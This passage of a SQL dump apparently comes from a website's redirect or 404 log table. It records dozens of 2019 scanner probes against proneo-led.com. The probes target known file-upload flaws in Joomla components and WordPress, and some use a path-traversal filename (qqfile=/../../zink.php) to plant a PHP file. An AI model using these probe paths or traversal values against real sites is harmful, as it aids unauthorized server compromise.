00:00:00',301),(22397,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:08:06','0000-00-00 00:00:00',301),(22398,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:08:06','0000-00-00 00:00:00',301),(22399,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:08:07','0000-00-00 00:00:00',301),(22400,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:08:07','0000-00-00 00:00:00',301),(22401,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:08:07','0000-00-00 00:00:00',301),(22402,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:08:07','0000-00-00 00:00:00',301),(22403,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:08:08','0000-00-00 00:00:00',301),(22404,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:08:08','0000-00-00 00:00:00',301),(22405,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:08:08','0000-00-00 00:00:00',301),(22406,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:08:09','0000-00-00 00:00:00',301),(22407,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-03-27 13:08:09','0000-00-00 00:00:00',301),(22408,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//wp-admin/admin-ajax.php',NULL,'','',3,0,'2019-03-27 13:08:10','0000-00-00 00:00:00',301),(22409,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2019-03-27 13:08:11','0000-00-00 00:00:00',301),(22410,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2019-03-27 13:08:11','0000-00-00 00:00:00',301),(22411,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',1,0,'2019-03-27 13:08:12','0000-00-00 00:00:00',301),(22412,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',1,0,'2019-03-27 13:08:12','0000-00-00 00:00:00',301),(22413,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',1,0,'2019-03-27 13:17:25','0000-00-00 00:00:00',301),(22414,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 13:17:25','0000-00-00 00:00:00',301),(22415,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 13:17:26','0000-00-00 00:00:00',301),(22416,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-03-27 13:17:26','0000-00-00 00:00:00',301),(22417,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:17:27','0000-00-00 00:00:00',301),(22418,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:17:27','0000-00-00 00:00:00',301),(22419,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:17:27','0000-00-00 00:00:00',301),(22420,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:17:28','0000-00-00 00:00:00',301),(22421,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:17:28','0000-00-00 00:00:00',301),(22422,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:17:28','0000-00-00 00:00:00',301),(22423,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:17:29','0000-00-00 00:00:00',301),(22424,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:17:29','0000-00-00 00:00:00',301),(22425,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:17:29','0000-00-00 00:00:00',301),(22426,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:17:30','0000-00-00 00:00:00',301),(22427,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:17:30','0000-00-00 00:00:00',301),(22428,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:17:30','0000-00-00 00:00:00',301),(22429,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-03-27 13:17:31','0000-00-00 00:00:00',301),(22430,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//wp-admin/admin-ajax.php',NULL,'','',3,0,'2019-03-27 13:17:31','0000-00-00 00:00:00',301),(22431,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2019-03-27 13:17:32','0000-00-00 00:00:00',301),(22432,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2019-03-27 13:17:33','0000-00-00 00:00:00',301),(22433,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',1,0,'2019-03-27 13:17:33','0000-00-00 00:00:00',301),(22434,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjjoffhoklhahxhpiskhqywacg4pbawcgmwfq&amp;usg=aovvaw1t-xrhon7mp4a-b4zxfk2-//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',1,0,'2019-03-27 13:17:34','0000-00-00 00:00:00',301),(22435,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',1,0,'2019-03-27 13:21:01','0000-00-00 00:00:00',301),(22436,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 13:21:01','0000-00-00 00:00:00',301),(22437,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 13:21:02','0000-00-00 00:00:00',301),(22438,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-03-27 13:21:03','0000-00-00 00:00:00',301),(22439,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:21:03','0000-00-00 00:00:00',301),(22440,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:21:03','0000-00-00 00:00:00',301),(22441,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:21:04','0000-00-00 00:00:00',301),(22442,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:21:04','0000-00-00 00:00:00',301),(22443,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:21:04','0000-00-00 00:00:00',301),(22444,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:21:04','0000-00-00 00:00:00',301),(22445,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:21:05','0000-00-00 00:00:00',301),(22446,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:21:05','0000-00-00 00:00:00',301),(22447,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:21:05','0000-00-00 00:00:00',301),(22448,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:21:06','0000-00-00 00:00:00',301),(22449,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:21:06','0000-00-00 00:00:00',301),(22450,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:21:06','0000-00-00 00:00:00',301),(22451,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-03-27 13:21:07','0000-00-00 00:00:00',301),(22452,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//wp-admin/admin-ajax.php',NULL,'','',3,0,'2019-03-27 13:21:07','0000-00-00 00:00:00',301),(22453,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2019-03-27 13:21:09','0000-00-00 00:00:00',301),(22454,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2019-03-27 13:21:09','0000-00-00 00:00:00',301),(22455,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',1,0,'2019-03-27 13:21:09','0000-00-00 00:00:00',301),(22456,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjh4zpioklhahubtoskhzihaqg4rhawceywcw&amp;usg=aovvaw0moo1ms7cbq5xu67eoa1ag//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',1,0,'2019-03-27 13:21:10','0000-00-00 